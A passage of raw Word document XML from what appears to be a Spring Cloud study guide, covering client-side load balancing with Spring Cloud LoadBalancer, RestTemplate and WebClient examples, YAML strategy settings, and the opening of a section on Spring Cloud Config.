          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D9D62BB" w14:textId="7777777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GetMapping</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get-data"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E196D9" w14:textId="7777777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getData</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7E64C07F" w14:textId="7777777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respons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estTemplat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getForObjec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http://user-service/user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class</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A39B4C8" w14:textId="7777777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response</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D9452F" w14:textId="7777777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1490C08" w14:textId="2BA72F27" w:rsidR="00AF49DE" w:rsidRPr="00CE4B95"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231259E0" w14:textId="2862C2BC" w:rsidR="00362AEA" w:rsidRPr="00CE4B95" w:rsidRDefault="00362AEA" w:rsidP="00362AEA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="120EBB6C" w14:textId="77777777" w:rsidR="00362AEA" w:rsidRPr="00CE4B95" w:rsidRDefault="00362AEA" w:rsidP="00362AEA">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user-service is the service name registered in Eureka, and Spring Cloud LoadBalancer will resolve its IPs and apply a round-robin strategy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C1FCCA" w14:textId="77777777" w:rsidR="004B1E96" w:rsidRPr="00CE4B95" w:rsidRDefault="004B1E96" w:rsidP="00362AEA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73614AA3" w14:textId="77777777" w:rsidR="004B1E96" w:rsidRPr="00CE4B95" w:rsidRDefault="004B1E96" w:rsidP="00362AEA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24FA23DD" w14:textId="77777777" w:rsidR="004B1E96" w:rsidRPr="00CE4B95" w:rsidRDefault="004B1E96" w:rsidP="00362AEA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A38D7EE" w14:textId="2B3EA1A4" w:rsidR="00362AEA" w:rsidRPr="00CE4B95" w:rsidRDefault="00362AEA" w:rsidP="00362AEA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51C09A0E" w14:textId="77777777" w:rsidR="00362AEA" w:rsidRPr="00CE4B95" w:rsidRDefault="00362AEA" w:rsidP="00362AE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pported Load Balancing Strategies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64E2E7B2" w14:textId="77777777" w:rsidR="00362AEA" w:rsidRPr="00CE4B95" w:rsidRDefault="00362AEA" w:rsidP="00362A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You can customize the strategy:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E842EC8" w14:textId="77777777" w:rsidR="00E15014" w:rsidRPr="00CE4B95"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137955"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>spring</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20037817" w14:textId="77777777" w:rsidR="00E15014" w:rsidRPr="00CE4B95"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137955"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  cloud</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4022BE22" w14:textId="77777777" w:rsidR="00E15014" w:rsidRPr="00CE4B95"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137955"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    loadbalancer</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE4E589" w14:textId="77777777" w:rsidR="00E15014" w:rsidRPr="00CE4B95"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137955"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">      ribbon</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B4681AC" w14:textId="77777777" w:rsidR="00E15014" w:rsidRPr="00CE4B95"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137955"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        enable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false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE99992" w14:textId="77777777" w:rsidR="00E15014" w:rsidRPr="00CE4B95"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137955"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    loadbalancer</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EB55A12" w14:textId="77777777" w:rsidR="00E15014" w:rsidRPr="00CE4B95"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137955"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">      hint</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7170A2A9" w14:textId="004A77D0" w:rsidR="00E15014" w:rsidRPr="00CE4B95"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137955"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        us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ervic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round</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obin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33A46E7A" w14:textId="5453D0F5" w:rsidR="00362AEA" w:rsidRPr="00CE4B95" w:rsidRDefault="00362AEA" w:rsidP="00362AEA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="462F013B" w14:textId="77777777" w:rsidR="00362AEA" w:rsidRPr="00CE4B95" w:rsidRDefault="00362AEA" w:rsidP="00362A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r use Java-based configuration with your own strategy (e.g., weighted, random, zone-aware).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39113786" w14:textId="77777777" w:rsidR="00362AEA" w:rsidRPr="00CE4B95" w:rsidRDefault="00362AEA" w:rsidP="00362AE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Alternatives to RestTemplate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="648BDE5A" w14:textId="77777777" w:rsidR="00362AEA" w:rsidRPr="00CE4B95" w:rsidRDefault="00362AEA" w:rsidP="00362AEA">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ebClient (recommended in reactive apps):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C4F13ED" w14:textId="77777777" w:rsidR="00E15014" w:rsidRPr="00CE4B95"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916125"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@Bean</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20BC2CBD" w14:textId="77777777" w:rsidR="00E15014" w:rsidRPr="00CE4B95"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916125"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@LoadBalanced</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E0D06A1" w14:textId="77777777" w:rsidR="00E15014" w:rsidRPr="00CE4B95"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916125"/>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WebClient</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Builder</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> webClientBuild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04C442A2" w14:textId="77777777" w:rsidR="00E15014" w:rsidRPr="00CE4B95"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916125"/>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retur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WebClien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builder</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52DB2A31" w14:textId="44879242" w:rsidR="00E15014" w:rsidRPr="00CE4B95"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916125"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="439F4FC8" w14:textId="77777777" w:rsidR="00362AEA" w:rsidRPr="00CE4B95" w:rsidRDefault="00362AEA" w:rsidP="00362AE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Behind the Scenes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51C48379" w14:textId="77777777" w:rsidR="00362AEA" w:rsidRPr="00CE4B95" w:rsidRDefault="00362AEA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18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adBalanced tells Spring to intercept HTTP calls and resolve service names to real IPs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF48E4C" w14:textId="77777777" w:rsidR="00362AEA" w:rsidRPr="00CE4B95" w:rsidRDefault="00362AEA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18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communicates with Eureka to get service instance details.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1303F58B" w14:textId="77777777" w:rsidR="00362AEA" w:rsidRPr="00CE4B95" w:rsidRDefault="00362AEA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="186"/>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t uses round-robin as default load balancing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17EA6D2A" w14:textId="4D591AA9" w:rsidR="00362AEA" w:rsidRPr="00CE4B95" w:rsidRDefault="00362AEA" w:rsidP="00362AEA">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Benefits</w:t>
      </w:r>
      <w:r w:rsidR="007D0696" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="176A94E4" w14:textId="51870393" w:rsidR="00362AEA" w:rsidRPr="00CE4B95" w:rsidRDefault="00362AEA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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utomatic client-side load balancing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EDE9DE1" w14:textId="5D619F07" w:rsidR="00362AEA" w:rsidRPr="00CE4B95" w:rsidRDefault="00362AEA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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hardcoded URLs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D5BC3A3" w14:textId="798A7C23" w:rsidR="00362AEA" w:rsidRPr="00CE4B95" w:rsidRDefault="00362AEA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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tegrates with Eureka, Consul, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="746D2AA4" w14:textId="2CD29C4C" w:rsidR="00362AEA" w:rsidRPr="00CE4B95" w:rsidRDefault="00362AEA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="187"/>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sy to extend and customize</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F5BD971" w14:textId="77777777" w:rsidR="00362AEA" w:rsidRPr="00CE4B95" w:rsidRDefault="00362AEA" w:rsidP="00362AEA">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1"/>
        <w:gridCol w:w="2508"/>
      </w:tblGrid>
      <w:tr w:rsidR="00362AEA" w:rsidRPr="00CE4B95" w14:paraId="51001FD2" w14:textId="77777777" w:rsidTr="00362AEA">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="61B1ADB3" w14:textId="77777777" w:rsidR="00362AEA" w:rsidRPr="00CE4B95" w:rsidRDefault="00362AEA" w:rsidP="00931C4D">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78618A36" w14:textId="77777777" w:rsidR="00362AEA" w:rsidRPr="00CE4B95" w:rsidRDefault="00362AEA" w:rsidP="00931C4D">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pring Cloud LoadBalancer</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00362AEA" w:rsidRPr="00CE4B95" w14:paraId="1FFFB658" w14:textId="77777777" w:rsidTr="00362AEA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0CD18BD7" w14:textId="77777777" w:rsidR="00362AEA" w:rsidRPr="00CE4B95" w:rsidRDefault="00362AEA" w:rsidP="00362A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ype</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5DEE74B2" w14:textId="77777777" w:rsidR="00362AEA" w:rsidRPr="00CE4B95" w:rsidRDefault="00362AEA" w:rsidP="00362A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ient-side</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00362AEA" w:rsidRPr="00CE4B95" w14:paraId="50CCD828" w14:textId="77777777" w:rsidTr="00362AEA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3003141A" w14:textId="77777777" w:rsidR="00362AEA" w:rsidRPr="00CE4B95" w:rsidRDefault="00362AEA" w:rsidP="00362A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efault Strategy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="012703E3" w14:textId="77777777" w:rsidR="00362AEA" w:rsidRPr="00CE4B95" w:rsidRDefault="00362AEA" w:rsidP="00362A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ound-Robin</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00362AEA" w:rsidRPr="00CE4B95" w14:paraId="5FDEE375" w14:textId="77777777" w:rsidTr="00362AEA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5D8D5551" w14:textId="77777777" w:rsidR="00362AEA" w:rsidRPr="00CE4B95" w:rsidRDefault="00362AEA" w:rsidP="00362A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rvice Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="120EE11D" w14:textId="77777777" w:rsidR="00362AEA" w:rsidRPr="00CE4B95" w:rsidRDefault="00362AEA" w:rsidP="00362A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quired (e.g., Eureka)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00362AEA" w:rsidRPr="00CE4B95" w14:paraId="2045183D" w14:textId="77777777" w:rsidTr="00362AEA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="04C8FC1D" w14:textId="77777777" w:rsidR="00362AEA" w:rsidRPr="00CE4B95" w:rsidRDefault="00362AEA" w:rsidP="00362A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placement for</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2D7C9AA3" w14:textId="77777777" w:rsidR="00362AEA" w:rsidRPr="00CE4B95" w:rsidRDefault="00362AEA" w:rsidP="00362A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etflix Ribbon</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00362AEA" w:rsidRPr="00CE4B95" w14:paraId="16131011" w14:textId="77777777" w:rsidTr="00362AEA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="15BF9868" w14:textId="77777777" w:rsidR="00362AEA" w:rsidRPr="00CE4B95" w:rsidRDefault="00362AEA" w:rsidP="00362A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orks with</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="724682C1" w14:textId="77777777" w:rsidR="00362AEA" w:rsidRPr="00CE4B95" w:rsidRDefault="00362AEA" w:rsidP="00362AEA">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stTemplate, WebClient</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="745C09A8" w14:textId="77777777" w:rsidR="00362AEA" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00362A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5C61B18">
          <v:rect id="_x0000_i2784" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C59ECCF" w14:textId="38630D66" w:rsidR="00615C7B" w:rsidRPr="00CE4B95" w:rsidRDefault="00D15646">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="676" w:name="_Toc196308156"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How Spring Cloud Config helps in centralized configuration management</w:t>
      </w:r>
      <w:r w:rsidR="00615C7B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="676"/>
    </w:p>
    <w:p w14:paraId="00DEB6EA" w14:textId="7012DFD1" w:rsidR="00615C7B" w:rsidRPr="00CE4B95" w:rsidRDefault="00615C7B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52823EBB" w14:textId="77777777" w:rsidR="00C01003" w:rsidRPr="00CE4B95" w:rsidRDefault="00C01003" w:rsidP="00C01003">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What is Spring Cloud Config?</w:t>
      </w:r>
    </w:p>
